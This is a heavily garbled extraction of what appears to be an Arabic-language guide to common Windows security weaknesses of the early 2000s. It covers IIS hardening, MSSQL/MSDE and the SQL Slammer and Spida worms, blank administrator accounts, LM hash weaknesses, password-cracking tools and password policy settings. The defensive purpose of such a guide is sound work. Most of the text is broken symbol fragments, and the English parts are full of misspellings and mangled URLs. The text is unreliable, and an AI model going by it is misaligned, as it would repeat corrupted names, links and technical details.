docUntitled
download 
Report Transcription
Untitled
!"
1
23 4 0
&'(
7 !89 "
0
25
?#
A
5L M 9
N M 9" ) , < % !
) !
$ @)
F 7, ,
6
&1@ )
(E $ F
: ),
6
-
% !
"
/)
56% !
-")
) 'D
? ,
, - .
6;. " -
56 $
) 5B
!C
8
%K
&' * +
:
-,< =! > ?@
J
)
# $% !
GH )
5 2'
O*
! 5E 2 '
I
I
H? "
?@
P 4)
,N
0
,G
R4 S @
3W 3 P
B
9
2
F) % 1 $
' ?5F
' 785/
0
T) , % !
) - 5 - Y $-,< 3 <
, * $ 3 M, 6
" 6
%
(
$O * 7
2 5
"
^
L )
?5F
6 @ 0, 5
" - Y
H7
E )
F 78#
2 5
=GX
F) B
! $ R4 S @ ^
R4 S @ d *
? &560
"
6&
$? 5F
) 6- Y/]
Code Red )
$7 !89
:
6A) "
$\
R N6 2
$% !
3
0,
F %K
? @ > GP
8 $
Ba I K6
6
?
" V,
I 5 ,G
* $M,6? G
) X
)? "
R4 S @ ^
K
0, 5
#P
<
"), )
- .)
& 5
Q
6U )
) [
3 _ R4 S @ ^
N &1@ ) K < 0
c
-
) 6? "
N` 6?), ) - # M 9
6
=GX - Y Z
I
,
) 6(
R4 S @ ^
<
b
R4S @
I 5 -, < 2 ),
5B
! 7,
0, <
S
0,< ,6 3 K
c
! 5E
6 'G " U4 $
2
0 3
% !
6
$
N 4
) B
6A) $, , e G
$ R4 S @ ^
"
6%
DY/
4 63
R4 S @ ^
2 5
$_ 1 f 4] "), )
0 3
R4 S @ ^
F) " [
&1 @ ) K < 0 )@
h <
6 A"
? "
,
)
"
? ,
0
=GX
-
"
)
6 S
"
6
! 5E
1) U#
- <
F
4 ) A8 % L/ $% !
7c
9 $U
785/ ) 7 , , SB
g $,
- <?@
R4 S @ ^
,F 7c
6 '? 5F
#P< )
0
4 63
bP
56
% !
6
? F i:
R4 S @ ^
-, " )
0, 6 ( E
("c 7 ,H ) <@ ? @
% !
6
F
-
K6
F
-)
-")
-
F
0, 5
"), )
-
3
I 5 ("c
6%5G1
% <)
bP
B5# ) , Y 7 !89
K6
? F
25F
b
f
% !
6
, G 785/ ?
- Y % !
R4 S @ ^
!
R4 S @ ^
! "#
i:
6
? G _7) Y
2 5
?
"
0
4
1
$
# "), )
- Y
G )
6 * ] "), ) "
$-,< ( E -
)\
a 5
• Internet Information Serveces (IIS)
• Microsoft SQL Server (MSSQL)
• Windows Authentication
• Internet Explorer (IE)
• Windows Remote Access Services
• Microft Data Access Componenets (MDAC)
• Windows Scripting Host (WSH)
• Microsoft Outlook Outlook Express
• Windows Peer to peer File Sharing (P2P)
• Simple Nerwork Management Protocol (SNMP)
785/
-,5!
] MSSQL ) IIS
6 3 $_) )
$ 1 2 T) j *
0 3
4
! " % &# '
Internet Information Services (IIS)
3
IIS
R 4 S @ $e 'j 4 , # 4 ) 7 5 I
a, 5 6 '
" 7, ,
",
) -,
_
3]
G
0, 5
I K6-, "
4 j 4 0, 5
N ISAPI
7 B
5! ( E
- Y $O)
Y 6ISAPI
6 B'" $IIS 0, 5
,F ) W 3 7 B
5! (&B $ISAPI
_SL ]
IIS SL ? "
)
Code Red, Code red 0, <
P 4
F
- Y 0, <
- Y
V < ) Server Side (SSI) Includes $Server
Pk
) - PSL
3 M ,6
4 " IIS
K6% '^ P ) N P56 I 5 _ <
bP
0,
23 , - 9*5 •
%
K6% '] ISAPI -,< 3 < %
ISAPI " PHP ) Coldfusion
Active
ZF•
37
-, 6 U )
W 3
,G
) 6% '23 , - 9*5 ) j 5 •
h / 6-
DLL O G
7P
[
? 5 TG' g •
_DOS] b)
6 B'? @
SL
? 5F
l '=GX "
b
" ,G
) e 'j 4 7 L C
85!
- Y Z
,<
6 B'"
O *
% H $l ' 6 B' Q
6
"
K6
5
0, - 5 - Y
5
l ' 6
/ 9
H F
,1 )
" ) -,6
,
6
P! &
I & IIS
% < $O) ? , 6 U )
0, -, < / 9 $O) -, 6 U )
B
5! b .
? # IIS - 5
< K
I h / 7 !89
7P
[
I5
%K ? 5 m.1 ? @
#B
5!
6
K
5 "
) - "
3
0
) - *1
0, 5
6'
'N
6% '
N " $ 1
) SL " U 4 IIS S
ntdll. Dll Web
R4 S @ ^
) 6 ' _U )
? 5 T G' g] Dos \
U)
)
8Q 0 )@
C
3 I
H ? 5F
$ F
6 ) nH
6
3 ], <
6 ' ? 5F
F
"
" 785/ ? # IIS5.0
#
R4 S @ ^
, N ) ( N (, !
F) E
F
H
?5F
) N
-, 6 U )
)
DAV
0,
-, 6
3 - *1 7
F
0_URL
SL IIS )
7 ) X
, ,F R 4 S @ ^
=GX
o
F)
F
")
) i.
)
K6%
, # 4 (,! % 1
, ,
& IIS
], 5
4)7 #
& PHP, Coldfusion
",
$ R4 S @ ^
,<
0_ N T L.
-, < SL T L.
T L.
T#< )
"
6=GX ) 78#
- Y IIS 5.1 *
0, 5
- Y IIS 6.0 "
pqqs "), ) )
G:H 785/ %
IIS
K
,
# )
-,
7,
) ' ) #
I5 ?
:
0 5 - Y
2 ) % <
' ) #
2
< IIS
1t
#
S L ?@ )
#P< )
^
? , 0
3
0, 5 ( N IIS S
" IIS
0, 5
! ". /0(123&
6 & 2 , ,F
&
:
K A & ?
L IIS
R 4 S @ $, < -,
, N $S L
XP"), ) •
l ' R4 S @ :
) e 'j 4 7
l '
pqqq "), ) •
Professional *
"
+
) SL
NT 4.0 "), ) •
-, 6 U )
0
6Patch
+,
- Y IIS 4.0 "
- Y q$r IIS "
0, 5
I ] 0,
N 0, 5 6 '
- $() *
0, 5
6h @
,
bP
Baseline Securiy Microsoft Analvzer
,6 3
$,
-, !
:
-,<
7,
0
4
GX)
I 5 ?@ " ) '
,G
!89 +
K
3j
$
F
-,< -
IIS
GX)
("c
') #
#B
5!
0
bP ) S
b
R4 S @ ^
. " $ 'S
+H ) , Y
Cheklists a I -,< K
,
"2
<" @ 7 ,
6, @ '? 5 TP
,
" - Y
$ B
/
, ,F =GX ^
=< 7" 5 0
Auto Update , windows Update 0
0
6Patch 2 3@
-,< K
,6 *
6Patch
6
h @" ?
'
IIS "
) - "
l
6? ,
X !
) - @ T L. 6
Update ? #
_ ' ) #
1
)
) X
^
Patch "
I5 S
K6 &
) B
.
)j 4
("c 5
- Y % H l ' & 0, 5
' &
*
I
2
3@ 0,
-,< K Patch 2 3@
)
b
6
K
XP
<
" #
- Y IIS - 56 PHP
("c 0
5 SL
IIS
-, < 'X
6
:
Patch % < $ ' ) #
' ) #
(N
K
http://www.microsft.com/technet/security/tools.hfnetchk.asp
) Perliis, CouldDusion
"
'
!
"), ) ) pqqq "), ) NT 4.0 "), ) )
0
6Patch
Checker Network Security Hotfix (HFNetchk)
? ,
F
456 123&
5 ( N $-, < K
- Y
F
# O B
:
-18 9 Patch # 7"! &
1
)
Patching 0
-, < S L -, 6 U )
)
) ( N6
K6A) "
! " %&
IIS
DY/ 6
$ #P< ? , 0, @ %5G - Y IIS
" - Y
i: Z
IIS
,<
-, < ( E
-,< K
6
<
"
(N
P ) GF
l '7c L.
6
F
6U )
) Windows
-, < 'X 7c L.
g] -,< 'X 7c L.
"
( N6
bP
? ,
0, 6 ( E
- (#=% ! & 2>
Lockdown IIS :; < &
? @
) ("c
6
("c ) - P
3
15
IIS
IIS
&)
IIS SL
K
h @" ?
0 5
F
25
I
*
0
-
&
<
') #
Lockdown
-,
. com/technet/security/tools/locktool.asphttp://www.microsoft
'
3 I
SL
"
7
:
Expert
u?
"7
u?# S
) Custom 1/
l'
F
IIS SL
2, 0 5 d *
^P
6 'IIS
a
?@
F)
5< I
N ] WebDAV ? 5 TG' g •
b. #
_,<
Printer, ism. a I ]
) X
g
< "
$O)
.
6ISAPI extensions ? 5 TG' g •
_Idq, htr
IIS - 56 -,< K
b
C 5!
T) ,
5
7
-
3 ) Code Blue
HTTP
0, <
6, "
?
URLScan
? @ A"
4 " % PH K6
) cmd.exe
27 ? 2 & @ 2>
I IIS
R4 S @ ^
6
3
I]
1
) K LLS Lockdown.
.
15
bP 785/ "
7 L
*
2 ` A R4 (,! ;!
&) - 5 l '
"
,G
6, " Code Red
85/] , 5
5
- Y
, #4
0, < -, 6 U )
http://www.microsoft ah @ "
0
- Y ?5F
URLSean
B'0_Buffer Ovrflow \ "
3
+ •
Z&F " O) -, 6 U )
0_tftp.
-HTTP + ,
5 MR/ •
6
N
b
?@ ?
' & com/technet/security/tools/locktool.asp
R4 S @ : 2 )
Microsoft SQL Server (MSSQL)
_MSSQL] ' ) #
, F R 4 S @ : 2,
- 9 *5 )
!89
3
0, 5
7
.
6 ' ? 5F
2#5 & -, 6 U )
3 M, 6
F
/ 7 !89
i.
R4 S @ ^
-, < =
'
?#
SQL ? , 6 U )
b
? &
MSSQL
( 5! W 3 F
- Y
u $h
SQL -, 6 U )
,
7 / 23 ,
# 4 (, ! % 1
, )W 3
0,
HS @), , e
6=GX "
!
?@)-
G
?5F
SQL- Slammer/ Spida Hell/ Sapphire ) SQLSnake/ Spida (
) 0, 5
) - Y MSSQL -, < 3 < =GX ^
3 ?1
( E l ' R4 S @ :
2'
,
F
F E F)
Tu<] ,
6(
:
-
" _pqqs ) pqqp T ]
-
785/ 6
1
@A
I
0_T
"
-,< TG'] SQLSnade/ Spida (
b. ,
6h @ ) +
:
,
- 1
@ ? & 0, 6
#P
< ' $ R4 S @
'
a 5 - Y
aMay 2002]
l ' 6(
j &' Kc ,/
B5# 7 !89
? " 7,
6
4"
" ?
K
c
$l '
B5# 7 !89
•
http: //isc. Incidents. Org/ ang lysis. Html? Id= 157
•
http: //www.eeye. com/ html/ Research/ Advisories/
AL20020522. Html.
•
http: //www.cert. org/ incident- notes/IN-2002-04. Html.
T G'] SQL-Slammer/SQL-Hell/Sapphire (
:
B5# 7 !89
aJanuary 2003 v
•
http: //isc. Incidents. Org/ analysis. Html? =157
•
http: //www.nextgenss. com/ advisories/ mssql-udp. Txt
•
http:
//www.eeye.
AL20030125. Html
com/
html/
Research/flash/
-,<
•
http: //www.cert. org/advisories/ CA-2003-04. Html
) wxss
4 Internet Storm Center b
67
K67 4 B
5F " _MSSQL -, 6 U )
,<
0
, #4
" ? 59 T L/
0,
2
0
I5
F
DY/
,
( , H ? @ ? 5 T G' g
sa Account
" ?
6
"
) h, /
-
P
6) ( E
:
" %#
T
0, 5
"
#
6
2<
)
U)
) 6
$l '(
%
N 4$
gatway
\ ' A) 2
#
N
7
UDP
^
0_-,< - < 7 4
'
L
/] , < %#
H
wxsx 7
bP
#4
4y
!89
F
3
H, , e G
)
I
Z F MSDE ? @
)
\X
!89
? ,6
Patching
6j 4 7 L
z) 3 ) ) ) -" F]
_ SQL -, 6 U )
6
F SQL
bP
MSDE 2000, Microsoft Server 2000 Deskrop Engine
,G 0 '
!89
1
@),, e G
("c 7 ,H 5
B')
6
#B
5!
5
l ' GH ) h
0 ' ,6 3
,
-, < K 7 ,
3& @,,
0
[
I5
) -,< N
wxsx 7 4
5 0, 5
'
Resolution Service
Overflow Stack Buffer \ 2
), <
?
SQL Slammer (
2
6
&
3 account
?@ "
h
"?&
R4 S @ ,L
K6U )
I
SF l 'Buffer Overflow 0
( ,H (
" :
Sa Account 0 5
P
!&
Buffer Overflow
_% 5/] A
bP
B5# 7 !89
- . _0 < 5 - Y SQL/MSDE Z F
SQL Server
..
0 < 5 - Y
I
-, ` 4
P
!&
account
^
K7 L
#B
5! - .
Null
_,<
- Y Chang the SQL Sevr Admininistror Login h @
?@ d *
b
SQLSnake (
N
, )
67 4] wxsx
25F
, account
("c :
" #
e 'j 4
H _ '#< - N]
sa account] e 'j 4
0
-, < K A & h
#P
< 6
#B
5!
"] SQL Lite Server ? G ?
2
P
/
?P
/
"
"
-, < S L Server SQL " *
) 6 @, <
)
7c L. - 56
Z&F "
? @)
# ? G MSDE 2000 0, ,
P
a
•
*<
SL
"
SQL/ MSDE Server 2000 (Developer, Sradard and
Enterprise Editions)
•
Visral
Studio.
NET
(Architect,
Developer
and
professional Editions)
•
ASP. NET Web Matrix Tool
•
Office XP
•
Access 2002
•
Visral Fox Pro 7.0/8.0
0, 5
,
-Y
, 6 3 SQL/MSDE -, 6 U )
#40
= B*
6A) " - Y
8Q 0 < C
A
" - Y
$? ,
H? ,
_TCP 7
0_
F) & -, < - <
wxsx 7
wxss 7
4
/ 9 -,
-
0,
TL
4
$pqqq MSDE
F
UDP
&1 # ?),
#
Overflow Buffer
^
4
U)
60
? ,
d*
")
GX) $, < , 6 3 ( E UDP h
6
;! $,<
)-
%L
?@
UDP
U)
^
0
$-, 6 U )
-, <
? ,
X02
0,
<
"
* A) " I '
,6 3A
wxsx 7 4 )
!89
K6
$
( 4
#4
NAMED PIPES
)
l '7 4 0
3
l ' ,
6" - Y ? # ] ,
? !
l '7
6
L ?
? ,
#) )
TL - . T
!89 $
( E
4" - Y
pqqqMSDE
!89
56MSDE ) SQL -, 6 U )
y 6567
#
b
& ?@
N?
4] Session NetBIOS
4 xxr|ws{ 7
^
,K
U)
#
R4 S @ ^
( E
U)
TCP
U)
6? G MSDE " l ' 6 &'(
!89
!89
3
:
F) -, 6 U )
\ 2 " 785/ 6, "
#
?@
F
pqqqMSDE
'
6-"
Z F System Local
,L
account
^
,
4 # " I ' ] 0,< ,6 3
) User Domain
$ F
6- Y/ " & @
0,6
,L
Overflow Buffer
)
- Y ,L
, , j6
F
("c 5 $
nH
Critical Update a I ! '
R4 S @
7 K
&F &1 @ ) K <@
' - Y _,
H , , ) - 9* e G
6& " - Y ) '
0 5 ( N6
[
0 5 - Y Incidents.org h @ " ?
- Y $, 5
? @-
6% '7
"), )
Microfoft SQL /MSDE Desktop Engine
"
,F 7
0,< ,6 3
N
:
)
8 (
6& "
h @n
^
+,
6*
"
6
6) , < -, < SL 2000
&'(
HS @),, 2 e G
2
l'
) pqqq SQL/MSDE Server7.0
$, 5
+
K
K
Kit Microsoft SQL
$ SQL/MSDE
56
- Y
- Y $, 5
0, 5
- $() *
SQL/MSDE Server,
F
, # 4 ) Patching " 5
% < 6 #P
< ) Domain ( 5 ?
6
^
" SQL Slammer #
, # 4 ) Patching " 5
nH
3) l ' F
! 5E
- Y MSDE 2000
! ". /0(123&
') #
<
9" ?
http://www.microsoft.com/sql/downloads/securitytools.asp
? @
SQL Critical Update Kit $-,< K Toolkit 0 5 , 4
6 & % < ) -,< -,
& SqlSecurity.com
0
SQL Critical Update ) SQL Scan
!89
-
K
5
$, 6
$l ' & 0
)? &
A
^
UDP1434 7 4
wxsx 7
SQL Pingv2.2 (
4
_X02
SQL ? , 6 U )
& :
2
UDP
, ]
0, 5
I
T
Subnet
) *
- 5< I
SQL Scan Microsoft
0
^P
!89 ) -
l ' &'(
#B
5! 0, 5
TP
("c v 4 ?@
(8!
! " %&
"7 B
5! $l ' R4 S @ : %
9
456 123&
6
DY/ I
a K5
GDEFE UDP C 2A SQL/MSDE Monitor Service ? 2A& A
* AB •
-, < K
6
S @ : )
BH " - Y ) SL
MSDE 2000
?), ) ) - " ) - Y
UDP n 9 " F
User
& @
b
) %L
6
O*
'L 7
T
( ,H $
)-
#P<
#P< )
6-"
1
@ " U4 F
SB #P
< )
^
account
2#5
F
&1
e G
O*
'L 7
R4
N`6
0 <; !
) Domain
6- Y/ "
0,6
UDP 1434 7 4
,L
0, 5
6
0, 5
T
s}~
IP
!89
6h @ 0
? 5 TG' g ] Dos \ " F
_U )
7 B
5!
MSDE SQL/MSDE 1 , I
SQL/MSDE -, 6 U )
F
4 # " I'
' $l '(
' " MB/Sec - E 4 " j - 1
@ 2<
0
,K
3 I
F
I
Ms-SQL/MSDE Slammer (
!89
Multicast \ " $,
n . $W ,
$
,L
s}~ % <
, 6 3 j &'
-, 6 U )
FSystem Local
' - Y $,
3(E
Buffer Overflow
,
MSDE2000
H , , ) - 9* e G
$
$l '
0 5 SQL Pack 3a Server 2000 - 56
F
'
n 9"
( ,H ?
( E ?# C
85! ) W L 3
+
:
$-,< P
[ 7< & h
0,< ,6 3
3
#P
<
Pack Service # 7"+ H ; •
Pack Service
6*
2 3@ G2000
a" ,
SQL/MSDE Server 7.0 Service Pack 4
Pack 3a MSDE/SQL Server 2000 Service
P
!
G Pack Service # A
7" I A1A
8 9 Patch # 7"+ H ;
U)
6*
b
5
-, < K
6Patch 2 3@ "
-,< K
- Y
"
6h @ " ?
I
SQL/MSDE/MSDE -, 6
21 " ?
F Patch 2 3@ SL " ? 59
a
6@
I
0 5 - Y
') #
SQL/MSDE -, 6 U )
:
SQL/MSDE Server 7.0 Microsoft
SQL Server 2000 Microsoft
Server Desktop Engine 2000(MSDE 2000) MSDE
9
<+ &H J K 7 + ,Patch + H ; •
Patch # 7" I
L2
Tasks Elevation of Privilege in SQL/MSDE Server
'G " U 4 G A
&1A
8
Patch ?
$ Web MS02-061
I
0
-,
a 5 - Y
K
"
"2
9
-,< K Patch 2 3@ "
6h @ " ?
6 @ ) ? 59
SQL/MSDE Server 7.0 Microsoft
SQL Server 2000 Microsoft
Server Desktop Engine 2000(MSDE 2000) MSDE
I
GPack Service # A
7" I A1A
8 A
9 Patch # A
7"+ H A
; •
-, 6 U )
6*
- Y
b
' ) #
-, 6 U )
5
-, < K
-, < K
6Patch 2 3@ "
21 " ?
SQL/MSDE/MSDE
F Patch 2 3@ S L " ? 59
:
a
- Y
"
6 @
I
0
5
SQL/MSDE
6h @ " ?
SQL/MSDE Server 7.0 Microsoft
SQL Server 2000 Microsoft
Server Desktop Engine 2000 (MSDE 2000) MSDE
Patch # 7" I
A
9 M2
<+ &H J K 7 + ,Patch + H ; •
Tasks Elevation of Privilege in SQL/MSDE Server
'G " U 4 G A
&1A
8
Patch ?
$ Web MS02-061
I
0
-,
K
"2
9
I
0
-,
a 5 - Y
K
"
Patch 2 3@ "
6 @ ) ? 59
-,< K Patch 2 3@ "
6 @ ) ? 59
"2
9
6h @ " ?
SQL/MSDE Server 7.0 Microsoft
SQL Server 2000 Microsoft
Server Desktop Engine 2000( MSDE 2000) MSDE
C 5! l '? # GAuthentication Logging SQL Server ? 2A& A
*•
Enterprise Manager
785/ 2 1
),
_sa” (
"
n 9" ?
# G ;NA
8
A
sa Account #
0
, F, , e G
j *
$, <
-, < K 7
4"
Server Book Online
sa Account
P
!& ?
" - Y
O%A
•
1A, I
A+
3
_blank]
#
$ MSSQL/MSDE
P
!&
SQL/MSDE
-,< DY/ P
!&
("c 0
< , 63
H
Administrator (SA) Login System
2t
5: W L3
("c ? 59
- Y SQL/MSDE
SQL/MSDE -, 6 U )
0_
TG' g
5 ( ,H
2
^
- Y l 'account " 9
K 7,
5
0
_Server Properties Security ]
, account "
-, < 3 <] e 'j 4
^
?@ ? 5 TG' I
R4 7 ) X ("c
/] 0
7 ,H
the SQL Server Administrator Login j *
) ' ) #
%
& $, 5
MSDN
/
5
-, <
and Change the System Administrator Password by Using ) $ Changing
) , #4
I
-,< K
6
) 7 # 2 3@ " ?
MSDE Verify
0 5 - Y $sa Account S
I
MSSQL/MSDE I
A
U)
4 :
Domain
?
2
!
]
Z F^
B
. 7"
) _NT "), )
6 56
A
6 A•
GSQL/MSDE Server Agent 1A,
. $ SQL/MSDE Server Agent ) -, 6 U )
] Local System
)
A AM2A C A ? &A
I
7"
] SYSTEM
S @e G
U)
%H , /
MSSQL/MSDE
account Valid
) administrator domain
0 _XP
) pqqq "), )
0
,6 3
#P< )
%
T
?#
F
Z F Domain
$
a
4
"
:
2
auditing ) Windows NT Authentication ? 5 T G'
U)
$-, < F
7
#<
)& @
MSSQL/MSDEServer
0, K5 T G' ? @ C, E ) = H
"
, 6( E
N
6Login
'
? ,
U)
,
#4$? #
0, 5 - Y Authentication NT
#P< "
g
6- ),.
F) 3 )
: y
B'0
) ) 7c L W L3
R4 7
W 3
TCP/UDP
;! ,
? , 6U)
^ P
P
6
("c
6U )
4"
F 3
67
4"
N 4
( E
bP ) MSSQL
"E
$ SQL/MSDE -, 6 U )
"
67 4 z) 3 ) ) )
)
B
3 ? 5F
G5
SQL/MSDE
4
("c #
B'
0
B'
G5 )
R4 S @ %
y
y
wxss ) wxsx
$, <
wxsx ) wxss
- Y
^
1
@)j
0
^
!89
$
(E
25 "
- Y
TCP/UDP
l ' 67 4 "
6 @
a 5 - Y
I
"
-
Microsoft SQL/ MSDE Server 7.0 Security
-
Microsoft SQL/ MSDE Server 2000 Seurity
6h @ " ?
! " % &# 2
Windows Authentiction
% G
6
6A)
?
6, )
Q0
b
f
-, < -
) 6 '-,< d *
+
" - Y
+
" - Y
DZ
0
N` 6?),
)
" U 4 ? 5F
)
" )-
6%
6account
#
- 5 account
, N ) = G0 <
( #.
" I'
H
?@ =GX
P
!&
u
-)8!
/)
+
,6 3
F)
2
3- Y
R
0,< ? "
H
% !
3\P ? "
+
P!
F) ,
B
5! $
) X
a
P
!&
< ,K
,
75I
€
P
! & ,H ' ) = GX
F
6 1G'( E
6, 4 ,
4"
2 1
), ) 2 5
,6 3
<
6(& # " - Y ] -,< , K ?
+ $
0
-
6
\ ' i: 2 1
) E
-,< 2),
S @^
,K
•c $
P
! & ,H ' ) = GX account
-, < K
:
) -,
,6 3
=
9P
? @"
0
H , F7 , , e G
< TP,
,F , , ,
b
SB
'
!89
F ) -, < = G
U 4 0, <
F
) , K " U4 ? @] 0,<
_0
2
, K " U4 0 < ,6 3 N
1G' #
,
" - Y
)?
6" E ) 7 "
S[ ?@
0, 6
6
1G'$
, -,<
H _7) Y
&
P
P! &
) % ' DY/ I ?
?# ?
P! & 2
P
! & 2'
-
"E
5 $
/
C
5
?@
?@?
6A) $
!89
6&
H -, < -
?@
)
) T) ,
P
!
+
, K
"
P
!&
6& " ?
P
!&
? "
9
P
!
% <&
^P
R4
-,< = G Account •
S
DY/ (, ! •
0-,< = G
, account E ?# $ F
= GX
6 &'(
0, 5
4
5! , B
hashing 5
N1
"
-, < &
) ) ,
\ 2 P
-
F) 2
, 5 ,H
6& " - Y
0
2
), 5
0, 5
P
!& ?
5 T
0 <
X
,K
+
"
S
) ( #.
3 1
)
GP
2
W L3
6& "), )
_hashing
6 *1 E/
F) , K
_
"
Hash ,
[ 19
a
"
N1\
)
6
F
Hash ,
D
"
("c
("c
P
!
I5 $ P
!&
DY/
= G
7 L
,
- 3•
P! &
message digest] -
,
<R
?#
# b
E _ <
$hash ,
-,< 3 < 0_
P! &
d
•
6
E 0
?@ -,6
) - 3•M Y<
- Y ?
N1]
b
)d*
7
)
P
! & ,H ')
)-
/
SB
g
0 < ,6 3
?@
h
83 ( 'hash ,
, Hashe ,
6'
P
! & Hashing
N& ]
3
) -, <
N $-, @
%5G1
P
•
)% !
5
"), )
5 ] LM •
NTLM •
_ 5
LM] Lan Manager] "
LM
-, < Hash
^
XP, 2000 , "), )
LM #
F
0, 5
"
" 7,
5
#< $ F
$, <
P
!
6&
- 3•_
B
. 7
P
LM
,
( #.
6 &' * 7 , H
-,
%#< 2 ,
B
G' 6 # )
P
5 ] NTLMv2 •
)
) X "), ) B
G' 6b. Q #
e 'j 4 7 L _ <
NTLM, ] ' ) #
#< -
5/
"
,
] NT
GX) pqqs "), )
N& T,
"
- Y _NTLMv2
6& $, 5
) 7 ,H
1
),
& LANMAN Hashes]
= GX S 5
P
!
Z#
L "), )
P
!
6&
/,
) W 3 K6A) " - Y
Y6
0,< , 6 3
HttpL://www.msdn.miscrosoft.com/library/default.asp?utl=/library/e
n-us/security/securiy/h-gly.asp
" % c, LM hashes =GX
a
0, <
0, <
% ,P
-
$ 13
0,
d *
&E
7 B
5!
Y6
H F
P
Qf
)
, 5 ! 5E )
2, )
Hashe d *
d *
& _dictionary- style]
P @ hashing LM A ) 2
6 <
0
Lan , K , @ 'SAM
Lmhashes "
)? ,
?@ )
K62<
A) %
HS
%H , / 0, <
P
!&
-
"), )
2
)d *
?
H F
6& •
Ih /
0,
2
F
6
F
- 3• :3 ) , ,
,F
-)8! 0
,6 3
e 'j 4 7 L ) SB
g Manager
#
("c 0
N1" - Y
6-
H$
' R4
-, < S L
I 5 hashes LM = GX
T
, K, @ ' ?
) 6 '_
,
' )n.
R4 S @ LM hashes A) " - Y
5! ?
P
!
K6 <
\X
- < # 2
6
F
K6 < 2
5
)
,K
5
P
!
, ` 4 0,< ,6 3 6 '
P
!&
U)
5 hash
6& •
P
!& d *
, 6 3 -, < 2 5 > ?@
)- 5
b
P
!
-
H, , e G
-, 6 U )
7 B
5!
$, <
#
6& •
0, -, < % , P • & M) /
Y6% < C
'
)-
P
!
-,< , K
/ S 5 ,<
#< C
/8:
6& •
_cracking]
),.
R 3 ) l '7 B
5! % 5#
S
P
!
hashing , @ ' 6
F
6
?# S
j &'Hash T 9
P
Y6j* )
C
'
+
>'" - Y
% ,P• & M) / C 5
0,
&
),.
!89
5
2
<] +5 l
0
,6 3
Y , 4
CG:H )
?# C
85!
P!
6& ? )@
GX)
,
- $() *
0,
H,, 2 e G
"), )
+
0
H F
U)
)- 5 V
&
( #.
- Y
"
6@
6
5
- <
%B
!)%c
"
#
%
/
0 5 - Y
1
) $, -,
?@
# 2
" E
'
B
.
"
)
0 ' ,6 3
#P<
!89
2
C,E
,6 3 S @ e G
$,<
-
5
) , 5 ,H
"
:
2
P! &
0, <
P
!
- 3• B
. )
•
Bc, #
<
F) -, 6 U )
( ,H 62 < " \ 2
! "
6& %
E
I 5 ("c
#B
5! .
- Y
•
0
" - Y = GX
0
2000. NT "), ) #
4 ) - 5 LM hashes T
<%
K6
H F
P, K , "
HS @e G
6" E
"2
0
LM
-,<
P
! & -, 6
- 3• # ) " I '
e 'j 4 7 L Lan Manager hahes
I5 ? "
b
,< ? , " ("c
a
, -,< SL e 'j 4 7 L XP,
K6
P
!
?5F
t6
F) C
8Q
)
("c
5 $
LAN Manager hash
^P
#
ZF
5
John the Ripper ) _LC44 ] 10phtcrack version " ?
"
5
TG' 6Account
6 &'(
?@
6*
! ". /0(123&
,
I 5 6A) 2 P
"
R 3 ?), 0,
:
3? "
6& cracking
P
!
d *
P
! & =GX
+,
,6 3 E
456 123&
\ '2 P
)2
6%5G1
%5
) ( #.
" ? 59
#.
I5 ? @
a
- 2N + ,P QR & Q;3
4
?
L•
P! &
6?
' T /2 !
' ? "W L3 )S
)-
6A) " - Y
P
! & -, 6 d *
A)
#
F
6
SB
g 0
0, 5
], <
2
" \ 2
0, <
_?@ =B*
:
%5
P
!
Y
_password] , 5
P
!
6&
O*
#
M /2 1
) 2' ]
)
,
"
<P?@
,1
P
"
P
!
M) / % , P ( ,H
?@ _
("c
2
? !7 P
!
'L
#) h
c 9 <
)@ ]
-,< F
"
&N F 5B 6
E
H?
_
7
-
-J)
("c 0 <
(E
" ) -,< -
1
) K5 - 3•
I ?
K6
5 $O 3 &
# 2
? "
2 ), " U4 _
, P4
H&
password
d *
6&
- <&
2 ?
)
P 785/ ?, < F
H I
T
\X
W 3
- 3•" M,6] ,<P %#
I 5 ("c %5G1
$-, < = G
( O
%5
P
!&
"
P
("c A" @ ?
3
#
/
) KP
Y1M) / "
!
-
5 MR / 5B
? @d *
6&
"
O* ,
M) /
P
!
%
) 5B
) " )@
M) / ) KP
Y1M) / "
*
6
"
, 6 3 785/
3?
5F
E ) O * W L3
B' (
-,< & %#<
" ,G0
)-
<
6
?@
-J ) M) / ) , !
-,< 3 < (
0 <-
N&
" - Y ) ,G
I5 ) - 5
0,< ,6 3 crack
0, < -,< h PH
),/
P
!&
"
-J )
= G
password ) - P
A)
"
<) "
,< -,< 3 < 5B
3
&
7 B
5! $& @
P 785/ P
6%#< %
-,< Y ? @
0, 5 = G
N F2
P
<" @ 6? "
6&
password (
C
'
P
!& d *
N F- 5 S
("c
0 5 crack
2
-, < 3 <
• ,G
= G - . W L3
Q
#
# 7 5B -, < &
P! &
?
(E
- Y
Hl ' 6
&' * " - Y
T#<
A" @ ) S
9*
&
" ) - 3•
P
!
6&
(8!
6%5G1
T 5! " U 4
" ?
P!
, 5 ,H
6&
Local
.
I5
2
PF 62 ) "
& 2
pqqs $XP $pqqq"), ) 0
6&
I 5 "), )
) 4 " ? 59
6*
)- Y
Q
"
0, <
$
?
b
6
" ?
&
:
- Y -,<
?
7
u
j &'
-,< = G
I5
-,6
a 5 TG' Securty Policy
Local Security Policy Program
Start Pr ograms Ad min istrativeTools Local Security Policy
Select: Account Policies, Then password Policy
a
? 5 TG' Password must meet complexity requirements
$l '
? "
, ` 4 ) ( #.
m .1
-, < = G
I5
P!
F
6 ,
!
6& $ 1/ 2
account ( "
0,<
*
0,<
a,<
" ! 5E
" -)
(&B
0, <
a,
% 5 ?
?@ " ) = G
" U4 )
3 B
P
H
"
P
!
(, ! W L3
? 5
P
!&
K6
% <
P
!&
_Z
A]
B
N
P
Y1• & M) / •
_z
a]
B
N
PY1
q
M) / •
6 H ] 6,6
_ %,µ, s/ ,! C
8Q] KP
Y1 g
,
"
5 $ P
!&
j< %H ,/
"
P! &
u ) E
E
)(5 % <
_{
U4
•
Policy Local Security
" 75 I
4(H
•
•
6
SB
g apassword history (range: 0-24 Enforce)
B
P
H P! & ?56C,E $ 3
5 d*
6& " - Y
?
"E ?
("c ? 59 #P< ? , $S
P
!& " - Y v
$l '
Z>
"
" - Y
0, 5 - Y
$, ,F -,< = G
P
! & 2,
2 , 0, <
, ,F
GX)
\X
,N
2 ) - )@
I
0,<
,
?
b
< TP,
, # 4 " U4 B '8
P
!
#P
<
6&
P! &
$ Y
5 $ P
!&
`*
d*
,
$") S /
0_, 5
$") S /
, 2'
P
!&
P
!&
I
_
u
_ P! ] 5! Q , /
P
!&
3
P
!&
u
H
B 'c
,< ,6 3
minimum password age , # 4 0,< maximum "
N
m.1& password history
u
5 ,H
) M , 6 -,
P
!&
P!
#
P
!&
0
? ,
(&B
LOG on 7 B
